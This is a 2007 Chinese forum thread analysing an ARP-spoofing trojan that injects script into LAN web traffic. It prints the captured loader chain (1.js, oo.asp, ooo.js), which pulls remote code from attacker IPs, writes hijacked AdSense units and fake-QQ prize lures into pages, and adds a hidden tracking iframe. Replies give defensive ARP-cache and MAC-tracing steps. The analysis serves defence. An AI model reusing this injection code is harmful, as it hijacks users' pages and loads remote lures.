
[已解决] ADS BY GOOGLE 新的ARP病毒 请问达人如何解决?

coral082 该用户已被删除
发表于 2007-12-2 01:27:33 | 显示全部楼层 |阅读模式
又一个 ARP 欺骗类木马:它在局域网内劫持 HTTP 流量、往经过的网页里注入脚本,夹带 Google AdSense(GG)广告和仿腾讯"百万Q币大放送"的诱骗页面。

最主要的特征是网页源码第一行多出一段 <script src=http://121.11.245.180/1.js></script> 脚本。注意这段脚本一般并不存在于服务器上的网页文件里,而是由局域网内的毒机在传输过程中注入的,所以服务器端检查是干净的,而局域网内访问任何 HTTP 网站都会看到它。
我们看一下具体的图(原帖截图未随转载保留):





打开上边那个 1.js,可以发现有以下内容(整段经过 URL 转义):
// Stage 1, the body of 1.js: the loader is URL-escaped as light obfuscation
// (note the second-stage IP is still readable inside the escaped text). Decoded below.
document.write(unescape(’%3Cscript%3E%0D%0A%0D%0Adocument.writeln%28%22%3Cscript%20type%3D%5C%22text%5C/javascript%5C%22%20src%20%3D%20%5C%22http%3A%5C/%5C/121.15.245.60%5C/oo.asp%5C%22%3E%3C%5C/script%3E%22%29%0D%0A%0D%0A%3C/script%3E’))
注意,内容仍是 escape 编码的;用 unescape 解码后可以看到:
// Stage 1 decoded: writes a <script> tag that pulls stage 2 from a second host, 121.15.245.60/oo.asp.
// The typographic quotes (’ ”) are an artifact of the forum's formatter; the original used ASCII quotes.
document.write(unescape(’<script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/oo.asp\”><\/script>”)
</script>’))
我们取回 http://121.15.245.60/oo.asp(注意这已经是第二台主机;分析时请在隔离环境里用 wget/curl 下载,不要直接用浏览器打开),可以看到源码是:
<!-- Stage 2, the body of oo.asp as captured by the poster: the first line re-includes 1.js (stage 1 and
     stage 2 reference each other), the second loads ooo.js, the actual payload shown below.
     Since oo.asp is pulled in via a <script src>, a browser would evaluate it as JavaScript; the HTML tag on
     the first line may therefore be an artifact of how the content was captured - confirm against the raw file. -->
<script src=http://121.11.245.180/1.js></script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/ooo.js\”><\/script>”)
第一行是前面见过的 1.js(两级互相引用);第二行加载的 ooo.js 才是真正的载荷。下载打开后内容如下:
// Payload (ooo.js). Everything it writes into the page is wrapped in <center>.
// NOTE: the typographic quotes (” ’) throughout this listing were introduced by the forum's formatter;
// the original script used ASCII quotes.
document.writeln(”<center>”);
// Swallow every runtime error so a failed injection or a blocked ad never surfaces an error to the victim.
window.onerror = function (){return true};
// Picks a pseudo-random integer in 1..a (parseInt truncates the fractional part of a*random()+1).
// Called once below as hgbrand(6) to choose which of the six ad/lure variants is injected on this page load.
function hgbrand(a)
{
  return parseInt((a)*Math.random()+1);
}
// Sets .location on element a (no standard effect on a plain element - presumably intended for a frame)
// and empties element b. Not called anywhere in this listing; possibly a leftover from another variant.
// The typographic quotes (’ ”) are a forum-formatting artifact; the original used ASCII quotes.
function hgbvclosew(a,b)
{
  document.getElementById(a).location=’about:blank’;
  document.getElementById(b).innerHTML=”";
}

优文网络提醒您:上面这个 hgbvclosew 只是把某个元素清空(innerHTML=""),而且在下面的代码里并没有被调用;你每次看到的广告/弹窗不同,真正的原因是下面 hgbrand(6) 随机取 1~6 来选择六个分支之一。
// Roll once per page load: hgbnumTemp is 1..6 and selects which variant below is written into the page.
// Variants 1-4 inject only an AdSense unit (4 of 6 loads); variants 5 and 6 add a fake-QQ "prize" banner too (2 of 6).
var hgbnumTemp;
hgbnumTemp=hgbrand(6);

// Variant 1: Google AdSense 728x90 text unit for publisher pub-6651899251830388, channel 8570106281, palette CC00FF.
if (hgbnumTemp==1)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

// Variant 2: identical to variant 1 (same publisher, channel and colours).
if (hgbnumTemp==2)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

// Variant 3: same publisher and channel, different palette (9900CC) and rc:6.
if (hgbnumTemp==3)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

// Variant 4: identical to variant 3.
if (hgbnumTemp==4)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

// Variant 5: same publisher and channel, palette 72179D, no google_ui_features - followed by the first fake-QQ lure.
if (hgbnumTemp==5)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)

// The lines above are the AdSense unit. Publisher ID pub-6651899251830388 appears in every variant - it is not
// clear whether it belongs to the malware author or is someone else's, planted to get that account penalised.
// Below, variant 5 additionally pins a fake-QQ banner (jq5.gif) to the bottom-right corner, linking to the
// lure page play.html on the stage-2 host.
document.writeln(”<div id=\”adid\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/play.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/jq5.gif\” border=\”0\”><\/a><\/div>”);
// A 200 ms timer re-positions the banner on every scroll so it stays in view (document.all is the legacy IE collection).
document.writeln(”<script>setInterval(\”runadid1dfas23()\”,200);function runadid1dfas23(){document.all.adid.style.top=document.body.scrollTop+document.body.clientHeight-159;document.all.adid.style.left=document.body.scrollLeft +document.body.clientWidth-256}<\/script>”)
}

// Variant 6: the same AdSense unit as variant 5, followed by the second fake-QQ lure (qq2.gif -> qq.html).
if (hgbnumTemp==6)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)

// AdSense unit as in variant 5; below, the fake-QQ banner variant pointing at qq.html.
document.writeln(”<div id=\”adidd\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/qq.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/qq2.gif\” border=\”0\”><\/a><\/div>”);
// Same re-positioning timer as variant 5, with different offsets (presumably a differently sized image).
document.writeln(”<script>setInterval(\”runadidd1dfas23()\”,200);function runadidd1dfas23(){document.all.adidd.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.adidd.style.left=document.body.scrollLeft +document.body.clientWidth-209}<\/script>”)
}

// Runs in every variant: a hidden 0x0 iframe to a third host, w.c0mo.com/1.htm, which turns out to hold a
// CNZZ web-analytics counter (see the next listing) - presumably so the operator can count injected page views.
document.writeln(”<iframe src=\”http:\/\/w.c0mo.com\/1.htm\” width=\”0\” height=\”0\”><\/iframe>”);
document.writeln(”</center>”);

注意上面这个宽高都为 0 的隐藏 iframe:打开 w.c0mo.com/1.htm,里面原来是 CNZZ 的统计代码——作者应该是用它来统计被注入页面的访问量,也算是做"数据分析"了。代码如下(其中 &amp; 是论坛转义,原文为 &):
<!-- Contents of w.c0mo.com/1.htm, loaded by the hidden iframe above: a CNZZ web-analytics counter (site id 675882).
     Every victim's browser fetches this from s119.cnzz.com, so the operator presumably uses it to count injected page
     views. The ’ quotes and the &amp; are forum-formatting artifacts of the original ASCII source. -->
<script src=’http://s119.cnzz.com/stat.php?id=675882&amp;web_id=675882&show=pic1′ language=’JavaScript’ charset=’gb2312′></script>
以上就是代码的具体分析。小结:注入链是 1.js(121.11.245.180)→ oo.asp(121.15.245.60)→ ooo.js;变现方式是 AdSense 发布者 pub-6651899251830388 的广告,外加两个仿 QQ 诱骗页 play.html / qq.html,以及 CNZZ(id 675882)的访问统计。这些地址和 ID 可直接作为排查时的特征(IOC)。但要注意:脚本是在局域网传输过程中被注入的,清理网站服务器没有用,关键是找出局域网里做 ARP 欺骗的那台机器(见楼下回复)。
coral082 该用户已被删除
 楼主| 发表于 2007-12-2 01:28:30 | 显示全部楼层
我这个出现了两天了 不知道怎么弄
上面的帖子是从360的论坛上转过来的
希望达人们能够解决
msconfig
发表于 2007-12-2 08:27:13 | 显示全部楼层
找到局域网里的毒机才是王道
Pastime
发表于 2007-12-2 08:57:32 | 显示全部楼层
  控制自己的鼠标 汗
command
发表于 2007-12-2 09:13:07 | 显示全部楼层
太强了,我一点都看不懂。
coral082 该用户已被删除
 楼主| 发表于 2007-12-3 11:18:58 | 显示全部楼层
顶上去
【超超】
发表于 2007-12-3 11:53:43 | 显示全部楼层
找到局域网内的带毒机器

在 CMD 中执行 arp -a(Windows 的 arp 命令没有 -R 参数,查看 ARP 缓存用的是 -a)
查看被攻击电脑的 ARP 缓存,重点看网关 IP 对应的那一条;不要记录上面的 IP 地址,而是记录对应的 MAC 地址
因为 ARP 欺骗的本质就是让网关 IP 映射到毒机网卡的 MAC,IP 本身不可信,而 MAC 一般就是毒机的真实地址(除非它连 MAC 也一起伪造了)
然后再多看几台电脑,看网关 IP 是否都指向同一个和路由器真实 MAC 不一致的地址

也可以先在 CMD 下用 arp -d 清除缓存,过几分钟再用 arp -a 查看,是哪个 MAC 又冒出来冒充网关
然后通过 MAC 地址(交换机的端口/MAC 表、DHCP 租约表,或逐台用 ipconfig /all 对比)找出毒机;临时缓解可以用 arp -s 把网关 IP 和真实 MAC 绑定成静态条目